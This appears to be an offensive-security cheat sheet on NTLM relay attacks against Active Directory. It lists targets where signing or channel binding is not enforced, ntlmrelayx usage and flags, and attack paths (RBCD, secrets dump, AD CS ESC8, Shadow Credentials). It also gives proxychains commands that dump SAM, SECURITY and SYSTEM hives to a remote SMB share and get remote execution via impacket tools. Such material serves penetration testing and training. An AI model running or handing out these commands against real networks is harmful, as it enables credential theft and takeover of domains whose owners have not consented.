NTLM Authentication Relay¶

1. Choose Targets¶

SMB on servers where signing is not required (server doesn’t enforce signing).
LDAP (389) on a DC with LDAP signing not required
- LDAPServerIntegrity = None (0) or Negotiate (1), not Require (2)
LDAPS (636) / LDAP+StartTLS on a DC with channel binding (EPA) not required
- LdapEnforceChannelBinding = Not required (0) or Compatible (1), not Required (2)
AD CS Web Enrollment (HTTP /certsrv/) where Extended Protection (EPA/CBT) is not required and NTLM is allowed
- IIS Extended Protection not required; Windows authentication (NTLM) enabled

2. Relay traffic with ntlmrelayx¶

Append socks5 127.0.0.1 1080 to /etc/proxychains.conf

Basic usage

ntlmrelayx -socks -tf <targets.txt> -w

Start ntlmrelayx before coercing and/or poisoning traffic.

This ensures capturing all traffic and prevents other tools from binding to ports before ntlmrelayx.

Example Targets File

smb://filesrv01
ldap://dc01.corp.local
ldaps://dc01.corp.local
http://ca.corp.local/certsrv/

Helpful Flags¶

Flag	Usage
`-socks`	Start SOCKS proxy (default port 1080).
`--socks-port <port>`	Change SOCKS port.
`-tf <file>`	Target file with hosts to relay to.
`-t <proto://host>`	Single relay target (e.g., `ldaps://dc01.corp.local`).
`-w`	Watch the target file for changes.
`-6`	Use IPv6 listeners (mitm6 scenarios).
`-smb2support`	Enable SMB2 when relaying to SMB.
`-l <dir>`	Loot/output directory.
`-wh <host>`	Serve WPAD PAC using `<host>` to capture proxy auth. Set `-wh wpad`
`-wa <N>`	Send N WPAD proxy-auth challenges before PAC.
`-debug`	Verbose logging.

WPAD capture requires victims to resolve wpad to you (e.g., via Responder/mitm6).

3. Coerce Authentication¶

Not always required; sometimes auth hits ntlmrelayx without poisoning.

Coercion / poisoning tools

4. Attack Paths¶

Resource Based Constrained Delegation (RBCD) — relay to LDAP/LDAPS; write msDS-AllowedToActOnBehalfOfOtherIdentity.
SAM/SECURITY/SYSTEM (Secrets Dump) — SMB relay; if relayed user is local admin, dump hives.
AD CS Abuse — ESC8: HTTP relay to /certsrv/.
Shadow Credentials — relay to LDAP/LDAPS; write msDS-KeyCredentialLink, then mint a TGT via PKINIT.
Crack the NTLMv1/2 Hash

Relay Tools¶

LDAP relay shell¶

Interactive inside ntlmrelayx once LDAP auth is relayed; type help in ntlmrelayx for commands.

Proxychains Tools¶

Use with sessions captured via ntlmrelayx -socks.

SMB¶

proxychains nxc smb <ip> -d <domain> -u <user> -p <password>

proxychains impacket-smbclient <domain>/<user>@<ip> -no-pass

SMB / Registry¶

proxychains impacket-reg <domain>/<user>@<ip> -no-pass save -keyName HKLM\SECURITY -o \\<smb_server_ip>\C$

proxychains impacket-reg <domain>/<user>@<ip> -no-pass save -keyName HKLM\SAM -o \\<smb_server_ip>\C$

proxychains impacket-reg <domain>/<user>@<ip> -no-pass save -keyName HKLM\SYSTEM -o \\<smb_server_ip>\C$

Remote Execution¶

Usually requires admin on target

proxychains impacket-smbexec <DOMAIN>/<user>@<host.fqdn> -no-pass

proxychains impacket-psexec <DOMAIN>/<user>@<host.fqdn> -no-pass

proxychains impacket-atexec <DOMAIN>/<user>@<host.fqdn> -no-pass "cmd.exe /c whoami"

Common Errors¶

Symptom	Likely gate
SMB relay fails with `STATUS_ACCESS_DENIED`	SMB signing required
LDAP bind fails / “stronger auth required”	LDAP signing required (`LDAPServerIntegrity=2`)
LDAPS error mentions channel binding	EPA/CBT required (`LdapEnforceChannelBinding=2`)